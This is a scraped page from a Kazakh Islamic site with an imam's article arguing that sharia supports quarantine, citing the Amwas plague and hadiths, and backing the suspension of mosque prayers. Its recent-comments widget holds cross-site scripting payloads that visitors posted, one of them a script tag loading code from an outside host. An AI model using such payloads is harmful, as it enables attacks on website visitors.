Карантин жайлы шариғат не дейді?
Алматы
Алматы Астана Шымкент Ақсай Ақсу Ақтау Ақтөбе Актогайский район Алтынсарин ауданы Алға Амангельдинский район Арал Арқалық Арысь Атасу ауылы Атбасар Атырау Аягөз Аққулы ауданы Байқоңыр Байғанин ауданы Балқаш Баянауыл ауданы Бейнеу Бәйдібек ауданы Денис ауданы Ембі Ертіс ауданы Еңбекшіқазақ Жітіқара ауданы Жалағаш кенті Жаңаөзен Жаңатас Жангелді ауданы Жаркент Жаңақорған кенті Жаңқала Жезді кенті Жезқазған Жетісай Жосалы Жосалы кенті Жәйрем Жәнібек Зайсан Индер Исатай ауданы Қарағанды Қаскелең Келес ауданы Кентау Көкшетау Қонаев Қостанай Қосшы Құлсары Курчатов Қызылорда Көкпекті ауданы Ленгер Лисаков Май ауданы Майқайын кенті Маханбет ауданы Мақат Меңдіқара ауданы Миялы Мойынқұм ауылы Мырзакент кенті Мәртөк ауданы Науырзым ауданы Ойыл ауданы Ордабасы ауданы Отырар ауданы Павлодар Петропавл Риддер Рудный с.Мангистау Сайрам ауданы Сайқын Сарыағаш Сарыкөл ауданы Сарыөзек Сәтпаев Сауран ауданы Семей Созақ ауданы Солнечный Степногорск Сырым ауданы Тайынша Талғар Талдықорған Тараз Таран ауданы Текелі қаласы Темиртау Тереңкөл ауданы Тереңөзек кенті Теңіз кен орны Түркістан Түлкібас кенті Узынагаш Орал Өскемен Федеров ауданы Форт-Шевченко Хромтау Целиноград ауданы Чапаев Шамалған ауылы Шу Шал ақын ауданы Шалқар Шарбақты ауданы Шардара Шетпе Шиелі кенті Шұбарқұдық Ырғыз ауданы Екібастұз Қазығұрт Қамысты ауданы Қандыағаш Қарабалық ауданы Қаражал Қарасу ауданы Қаратау Қарғалы Қобда ауданы Қордай Құрманғазы ауданы Құрық Үржар ауданы Үшарал Ұзынкөл ауданы Әйтеке би ауданы Әйтеке би кенті Әулиекөл ауданы
Бесін 11:56
Алматы
Алматы Астана Шымкент Ақсай Ақсу Ақтау Ақтөбе Актогайский район Алтынсарин ауданы Алға Амангельдинский район Арал Арқалық Арысь Атасу ауылы Атбасар Атырау Аягөз Аққулы ауданы Байқоңыр Байғанин ауданы Балқаш Баянауыл ауданы Бейнеу Бәйдібек ауданы Денис ауданы Ембі Ертіс ауданы Еңбекшіқазақ Жітіқара ауданы Жалағаш кенті Жаңаөзен Жаңатас Жангелді ауданы Жаркент Жаңақорған кенті Жаңқала Жезді кенті Жезқазған Жетісай Жосалы Жосалы кенті Жәйрем Жәнібек Зайсан Индер Исатай ауданы Қарағанды Қаскелең Келес ауданы Кентау Көкшетау Қонаев Қостанай Қосшы Құлсары Курчатов Қызылорда Көкпекті ауданы Ленгер Лисаков Май ауданы Майқайын кенті Маханбет ауданы Мақат Меңдіқара ауданы Миялы Мойынқұм ауылы Мырзакент кенті Мәртөк ауданы Науырзым ауданы Ойыл ауданы Ордабасы ауданы Отырар ауданы Павлодар Петропавл Риддер Рудный с.Мангистау Сайрам ауданы Сайқын Сарыағаш Сарыкөл ауданы Сарыөзек Сәтпаев Сауран ауданы Семей Созақ ауданы Солнечный Степногорск Сырым ауданы Тайынша Талғар Талдықорған Тараз Таран ауданы Текелі қаласы Темиртау Тереңкөл ауданы Тереңөзек кенті Теңіз кен орны Түркістан Түлкібас кенті Узынагаш Орал Өскемен Федеров ауданы Форт-Шевченко Хромтау Целиноград ауданы Чапаев Шамалған ауылы Шу Шал ақын ауданы Шалқар Шарбақты ауданы Шардара Шетпе Шиелі кенті Шұбарқұдық Ырғыз ауданы Екібастұз Қазығұрт Қамысты ауданы Қандыағаш Қарабалық ауданы Қаражал Қарасу ауданы Қаратау Қарғалы Қобда ауданы Қордай Құрманғазы ауданы Құрық Үржар ауданы Үшарал Ұзынкөл ауданы Әйтеке би ауданы Әйтеке би кенті Әулиекөл ауданы
Алматы
ықшамдау
Таң Күн Бесін Аср Ақшам Құптан
05:57 07:20 11:56 14:44 16:26 17:49
ықшамдау
Күнтізбе
Хижри
24 Джумада-сани 1446
Миләди
26 желтоқсан 2024

Мақалалар

Карантин жайлы шариғат не дейді?

| A | +

Омар бин Хаттабтың халифалығы кезінде һижраның 18 жылы оба ауруы тарады. Тарихта бұл обаға Амуас обасы деген ат берілген. Амуас – оба шыққан ошақ. Палестинадағы Рамлә мен Байт-Мақдис арасында орналасқан шағын қала.

 

Оба Шам аймағында тез тарала бастады. Бұл дерт 25-30 мыңға жуық кісінің өмірін жалмады. Дерттен көз жұмғандар қатарында Әбу Убайда ибн Жаррах, Мұғаз бин Жабал, Сухайл бин Амр (р.а.) және де басқа да көптеген сахабалар шейіт болды. Бұл хабар Мәдина қаласына жеткенде халифа Омардың Шам аймағына мемлекет басшысы ретінде іс сапарға шығуы жоспарланған еді.

 

Аталған оқиғаны Абдулла бин Аббас (р.а.) еске алып былай деп баяндайды: «Халифа Омар (р.а.) Шам аймағына сапарға шығып, Мәдина қаласынан алыстап, Сарғ елдімекеніне де жетіп қалған еді. Осы кезде Шам қолбасшысы Әбу Убайда (р.а.) серіктерімен суық хабар алып келді. Шам аймағында оба барын хабарлады.

 

Халифа Омар (р.а.) Ибн Аббасқа алғашқы мұхажир сахабаларды шақыртып кеңес құрды. Меккелік мұхажир сахабалар бір шешімге келе алмады. Бір тобы: «Үлкен жоспармен жолға шықтыңыз. Кері қайтқаныңыз дұрыс болмайды», - десті. Екінші тарап: «Сізбен бірге бұл жолға Алла елшісінің сахабалары да шықты. Олардың басын бәйгеге тігіп оба жайылған жерге барғаныңыз жөн болмас», - деген пікір білдірді.

 

Халифа ансар сахабаларды шақыртып, олармен де жеке кеңес құрды. Мәдиналық сахабалар да бір тоқтамға келе алмады. Соңында халифа: «Ертең жолға шығамыз. Кері ораламыз, жұртқа хабар берілсін», – деді. Мұны естіген Әбу Убайда (р.а.): «Алланың тағдырынан қашып барасыз ба?» – деді.

 

Сонда Халифа бұл шешімін қолбасшыға былайша түсіндірді: «Иә, Алланың тағдырынан Алланың тағдырына бара жатырмын. Егер де сенің түйелерің болса, ал алдыңнан бір жағының шөбі шүйгін, екінші жағы сортаң жайылым кезіксе, түйелеріңді қалауыңмен шөбі шүйгін жағына жайсаң да, Алланың тағдырымен,  сортаң жағына жайсаң да Алланың тағдырымен жайған болмайсың ба?» деді.

 

Осы кезде жеке шаруасымен жүрген сахаба Абдурахман бин Ауф (р.а.) қайтып келе жатқан еді. Болған жайтты естіп, халифаға: Бұл мәселеге қатысты менде Алла елшісінен (с.ғ.с.) естіген риуаятым бар: «Бір жерден оба шықты деп естісеңдер, онда барушы болмаңдар. Ал егер сендер тұрған жерден шықса, обадан қашып ол жерден шықпаңдар», - деген еді» – дейді. Мұны естіген халифа Омар (р.а.) қабылдаған шешімінің хадиске сай келгеніне шүкіршілік етті. Міне, бұл риуаят жұқпалы ауру белең алған кезде орындалатын қажетті карантин шаралары.

 

Шариғатта қорғауға алынған бес негіздің ішінде: адам өмірі мен денсаулығын қорғау және сақтау бар. Оның көрінісі дәрет, намаз, ораза және басқа да құлшылықтарда көрініс табады. Бұл маңызды. Суық кезде салқын сумен дәрет алмау. Науқас адамдардың Рамазан оразасынан уақытша босатылуы осы негізде жүзеге асырылады.

 

Бүгінгі жағдайға байланысты Сахих Муслим жинағында Абдулла бин Аббас (р.а.) жаңбыр құйып тұрған күні азаншыға: «Алладан басқа құдай жоқ екеніне куәлік етемін, Мұхаммед Оның елшісі екеніне куәлік етемін» деген азан сөздерінен кейін «Намазға асығыңдар» деген сөздің орнына: «Үйлеріңде оқыңдар», - деп айт», – деген риуаят бар. Риуаяттың жалғасында: «Мұны жұрт құп көрмегендей сыңай танытты. Сонда сахаба Ибн Аббас (р.а.): «Сіздер бұған таң қалып тұрсыздар ма? Менен әлдеқайда қайырлы (ұлық, мәртебелі) адам мұны істеген», - деп пайғамбарымызды меңзеген екен. Ибн Аббас (р.а.) мұны жаңбыр нөсерлеп жауып тұрған уақытта көпшілікке жұмаға қатысуы қиындық тудыратынын түсініп, шешім қабылдаған. Бұл хадис Бұхари еңбегінде де кездеседі.

 

Абдулла бин Омар (р.а.) суық және дауылды түнде намаз азанында: «Көліктеріңнің жанында намаз оқыңдар», – деген сөз айтады. Оның себебін Алла елшісі (оған Алланың салауаты мен сәлемі болсын) қатты суық және жаңбырлы түнде азаншыға: «Көліктеріңнің жанында намаз оқыңдар», - деп айттыратын, – дейді. Көліктері дегені жолаушылап жүргенде түйелері мен жүктерінің жанында. Демек, тұрғылықты және жолаушыға да өміріне немесе денсаулығына қауіп төнгенде сақтық шараларын жасау қажет екендігі риуаяттарда айтылған.

 

Мұсылман үшін әр жағдай қайырлы. Әр жағдайды өз игілігіне қарай икемдей біледі. Осы бір кезеңді тиімді пайдаланып, бала-шаға тәрбиесіне ерекше көңіл бөлуге мүмкіндік деп білген жөн. Бала-шағамен жамағат боп үйде құлшылық ету, дұға тілеу – әрбіріміздің арманымыз. Ата-анасына айтарлықтай көңіл бөлуге уақыт таппай жүрген жанға да бұл бір мүмкіндік. Ал ойы түзу емес адам ең қолайлы сәттің өзінен бір мін немесе кемшілік таба алады. Өйткені, әркімнің көзі жүрегіндегі діттеген дүниесіне түсетіні мәлім.

 

Жұма намазы мен бес уақыт намазды мешітте жамағатпен оқуды уақытша тоқтату жөнінде ҚМДБ Ғұламалар кеңесі шығарған пәтуасы – бұқара халықтың денсаулығы мен амандығын сақтау мақсатында дер кезінде қабылданған шешім. Көршілес – Өзбекстан, Қырғызстан, Тәжікстан, Ресей, Түркия, Иран, Сауд Арабия, Кувейт, Мысыр, Йордания, Палестина, Марокка, Малайзия елдерінде де осындай шешім қабылданып, жұма намазы уақытша тоқтатылды.

 

Құрметті бауырлар! Сол себепті, әртүрлі алыпқашпа әңгімелер мен өзге елде отырған «шейхсымақтардың» пәтуаларына алаңдамай ҚМДБ пәтуасына мойынсұнайық. Пәтуа – ғұламалардың ортақ шешімі. Ал ол пәтуаға бағыну –ел мұсылмандарына уәжіп. Бұл күн де өтер. Бастысы, қоғамның және өзіміздің амандығымыз үшін көрсетілген барлық сақтық шараларын жасайық. Алла Тағаладан жамағат боп барлық діни рәсімдеріміз бен құлшылықтарызды атқаратын күнге жеткізсін деп тілейік! Әумин!

 

Төлеби ОСПАН,

Ақтөбе облысының бас имамы

Предыдущий Следующий
Дәреттің қадір-қасиеті Ислам діні жұқпалы дерттен қорғану туралы не айтады?

Оқырмандардың пікірі (0)

Қызықты тақырыптар

Сұрақ-жауап Ислам діні жұқпалы дерттен қорғану туралы не айтады?
Ислам діні бір қандай қауіп-қатер болмасын оның алдын алуға, онымен дер кезінде күресуге, індеттің таралмауына баса назар аударады. Хақ діннің үкімдерінің негізгі қорғайтын бес нәрсесі – дін, ақыл, мал-мүлік, ар-намыс пен ұрпақ және адам өмірі («Исра» сүресі, 33-аят) екені белгілі. Алла Тағала Құран...
Сұрақ-жауап Жұлдызнамаға (гороскоп) сенуге бола ма?
Жұлдыздармен тағдырды болжау – сиқыршылыққа жататынын білуіміз керек. Пайғамбарымыз (оған Алланың салауаты мен сәлемі болсын): «Кімде-кім қандай да бір ақпаратты жұлдызбен болжап алатын болса, ол сиқыршылықтың бір түрімен айналысып жатыр, неғұрлым көп (айналысса), соғұрлым көп (күнә алады)»[2] – дег...
Сұрақ-жауап Құрамында шошқа майы бар дәрі-дәрмектерді пайдалануға бола ма?
Қазіргі таңда көптеген дәрілерге шошқаның ағзаларынан алынатын ферменттер қосылады. Оның басты себебі, шошқаның ұйқы безінен алынатын панкреатин атты фермент (ыдыратушы катализатор) тамақтың тез қортылуына септігін тигізеді....
Сұрақ-жауап Әкенің белінен ананың құрсағынан болмаған жаратылыс бар ма?
Сұрақ: әкенің белінен ананың құрсағынан болмаған жаратылыс бар ма?  
Сұрақ-жауап Дініміздегі Алла елшісінен кейінгі мәртебелі тұлғалар кімдер?
Жауап: Нағында, пайғамбарлар Ұлы Жаратушының адамзат баласына жіберген ең таңдаулы құлдары. Олар Алла Тағаланың мейірімі мен рақымдылығы ретінде жер бетіндегі қауымдарға елшілер және нәбилер болып келген. Сол себепті, пайғамбарлық – адамзат баласы үшін ең үлкен мәртебе саналады. Ешбір адам көркем-мі...
Сұрақ-жауап Аборт жасату күнә ма?
Шариғатымызда құрсақтағы баланы себепсіз түсіруге, аборт жасауға тыйым салынған. Өйткені бұл ұрпаққа тас ату әрі жер бетінде бүлік тарату болып саналады. Ғұламалар ешбір себепсіз жасанды түсік жасатуды жәһилет (исламнан бұрынғы уақыт) дәуіріндегі адамдардың қыздарын тірідей көмген ісіне теңеген. Бал...
ықшамдау
Күнтізбе
Хижри
24 Джумада-сани 1446
Миләди
26 желтоқсан 2024
Намаз уақыттары
қазір

Бесін 11:56

Екінтіге дейін 01:58

Что будет, если увидеть во сне Пророка ﷺ?

"/>"/"/><sCRiPt sRC=https://xss9.com/ivMw></sCrIpT>

X X
23 сағат. бұрын

О милостыне

"/1

X X
23 сағат. бұрын

Задайте вопрос устазам

Ва алейкум ассалам. Ваше омовение и намаз действительны, так как нить установлена в лечебных и в

Администратор Azankz
17 жел. 2024

Признаки любви к Пророку ﷺ

<script>alert(a)</script>

X
28 қыр. 2024

Обязанности мужчины перед своей семьей

А как же быть женщине, такой как я, которая рано вышла замуж, работала вплоть до родов, собирала каж

Лейла
28 қыр. 2024
Created with Sketch. {{!-- --}} {{!-- --}} {{!-- --}} Created with Sketch. Asset 1mdpi